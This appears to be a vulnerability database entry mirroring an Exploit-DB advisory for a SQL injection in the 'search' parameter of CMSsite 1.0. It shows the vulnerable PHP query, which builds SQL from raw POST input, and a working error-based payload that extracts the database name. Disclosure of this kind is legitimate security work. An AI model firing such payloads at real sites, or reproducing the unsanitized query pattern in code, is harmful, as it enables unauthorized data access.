CMSsite 1.0 - 'search' SQL injection

vendor:

CMSsite

by:

Majid kalantari

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: CMSsite

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: CMSsite:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2019

CMSsite 1.0 – ‘search’ SQL injection

The CMSsite 1.0 version is vulnerable to SQL injection through the 'search' parameter in the 'search.php' file. An attacker can exploit this vulnerability by injecting malicious SQL code into the search textbox.

Mitigation:

The vendor should sanitize user inputs and use prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: CMSsite 1.0 - 'search' SQL injection
# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
# Date: 2019-01-27
# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A
===============================================

# vulnerable file: search.php
# vulnerable parameter : POST - search

if (isset($_POST['submit'])) {
    $search = $_POST["search"];
}
$query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND
post_status='publish'";
$search_query = mysqli_query($con, $query);

# payload on search text box: ' and
extractvalue(1,concat(':',database(),':'))#

===============================================